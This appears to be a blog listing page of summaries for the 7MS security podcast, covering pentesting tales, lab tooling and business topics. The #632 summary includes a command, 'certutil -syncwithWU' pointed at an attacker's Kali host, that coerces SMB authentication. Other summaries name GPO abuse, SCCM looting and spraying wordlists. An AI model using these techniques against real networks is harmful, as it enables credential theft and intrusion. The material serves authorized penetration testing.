Blog
Search all our posts or browse some of our most recent entries below:
7MS #636: A Prelude to BPATTY(RELOADED)
Artificial hype alert! I'm working on a NEW version of BPATTY (Brian's Pentesting and Technical Tips for You), but it is delayed because of a weird domain name hostage negotiation situation. It's weird. But in the meantime I want to talk about the project (which is a pentest documentation library built on Docusaurus) and how I think it will be bigger/better/stronger/faster/cooler than BPATTY v1 (which [...]
7MS #635: Eating the Security Dog Food – Part 7
Today we're talking about eating the security dog food - specifically: Satisfying critical security control #1 Using the Atlassian family of tools to create a ticketing/change control system and wrap it into an asset inventory Leveraging Wazuh as a security monitoring system (with eventual plans to leverage its API to feed Atlassian inventory data)
7MS #634: Tales of Pentest Pwnage – Part 60
Hi, today's tale of pentest pwnage covers a few wins and one loss: A cool opportunity to drop Farmer "crops" to a domain admin's desktop folder via PowerShell remote session Finding super sensitive data by dumpster-diving into a stale C:\Users\Domain-Admin profile Finding a vCenter database backup and being unable to pwn it using vcenter_saml_login
7MS #633: How to Create a Security Knowledgebase with Docusaurus
Hey friends, we're doing a little departure from our normal topics and focusing on how to create a security knowledgebase (is that one word or two?) using Docusaurus! It's cool, it's free, it's from Meta and you can get up and going in just a few commands - check out their getting started guide to get rockin' in about 5 minutes. Important files include: [...]
7MS #632: Tales of Pentest Pwnage – Part 59
Today's tale of pentest pwnage includes some fun stuff, including: SharpGPOAbuse helps abuse vulnerable GPOs! Try submitting a harmless POC first via a scheduled task - like ping -n 1 your.kali.ip.address. When you're ready to fire off a task that coerces SMB auth, try certutil -syncwithWU \\your.kali.ip.address\arbitrary-folder. I'm not 100% sure on this, but I think scheduled tasks capture Kerberos tickets temporarily to workstation(s). If [...]
7MS #631: Tales of Pentest Pwnage – Part 58
Hi friends, today's a tale full of test tips and tools to help you in your adventures in pentesting! SCCM Exploitation SCCM Exploitation: The First Cred Is the Deepest II w/ Gabriel Prud'homme - fantastic resource for learning all about attacking SCCM - starting from a perspective of zero creds CMLoot - find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares [...]
7MS #630: Epic Road Trip Served with Security Sprinkles
Today I recap a two week personal/biz road trip and talk about the security stuff that got sprinkled into it, including: Family members who don't care about their personal security Weakpass - a cool collection of word lists for brute-forcing and spraying that I'd never heard of Working on two security Webinars for Netwrix (here's part 1: Mastering Password Security & Active Directory Monitoring, [...]
7MS #629: Interview with Stu Musil of Ambient Consulting
Today we have a fun featured interview with my new friend Stu Musil of Ambient Consulting I had a great time talking with Stu about bashing come common misconceptions people have about working with recruiters, plus tackling some frequently asked questions: How do you properly vet a recruiter you don't know, but who offers a job opportunity you're interested in? What questions should you ask [...]
7MS #628: How to Succeed in Business Without Really Crying – Part 17
Hey friends, today we talk about some not-so-glamorous but ever-so-important stuff related to running a cybersecurity consultancy, including: Taking an inventory of all the SaaS stuff your business uses - to keep an eye on spending, know when services are expiring, and track which credit card the services are tied to (so the services don't almost get cancelled like some did with me!) Tracking domain [...]
7MS #627: Migrating from vCenter to Proxmox – Part 2
Hey friends, today we continue our series all about migrating from VMWare to the world Proxmox! Specifically: Getting my first Proxmox-based NUCs out in the field for live engagements! Pulling the trigger on two bare-metal Proxmox servers to eventually replace my vCenter environment. OVHCloud made it super easy to to add Proxmox to those bare-metals with a simple wizard. I couldn't figure out how [...]
7MS #626: Web Pentesting Pastiche
SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 20% discount! Hey friends, today we've got a security milkshake episode about Web app pentesting. Specifically we talk about: Burp Suite Enterprise Caido - a lightweight alternative to Burp wfuzz - Web fuzzer. [...]